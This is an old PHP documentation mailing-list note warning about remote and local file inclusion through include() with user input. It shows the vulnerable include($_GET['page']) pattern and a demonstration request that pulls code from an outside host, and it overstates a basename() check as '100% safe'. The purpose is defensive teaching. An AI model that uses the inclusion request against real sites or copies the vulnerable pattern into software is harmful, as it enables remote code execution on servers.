note 29234 added to function.include

From: Date: Thu, 06 Feb 2003 21:24:42 +0000
Subject: note 29234 added to function.include
Groups: php.notes 
Request: Send a blank email to php-notes+get-43529@lists.php.net to get a copy of this message
The "Editor's note" to "fekalius at web dot de" post mentions that the code can be a big security risk. I want to stress that it is a VERY BIG security risk, as a malicious could send un-parsed PHP code. Dangerous code could look like this: include("$file"); Don't think you are safe just because you use: include("./php/$file.php"); It WILL make it harder to "hack" your script, but NOT impossible. If you want to be 100% safe, use something similar to this: if (isset($page) && is_file(basename($page))) include(basename($page)); If you don't use code similar to the one above, a malicious would be able to use ANY PHP function. This means that he/she would be able to delete files, create new files, maybe even execute files etc. Try creating a new .php file containing the following code... <?php include($_GET['page']); ?> ... save and upload it. Now run the script in your browser with the following query string: ?page=http://raz0.zalon.dk/safe eg. http://www.somehost.com/script.php?page=http://raz0.zalon.dk/safe Hope this helps someone :) -- http://www.php.net/manual/en/function.include.php http://master.php.net/manage/user-notes.php?action=edit+29234 http://master.php.net/manage/user-notes.php?action=delete+29234 http://master.php.net/manage/user-notes.php?action=reject+29234

« previous php.notes (#43529) next »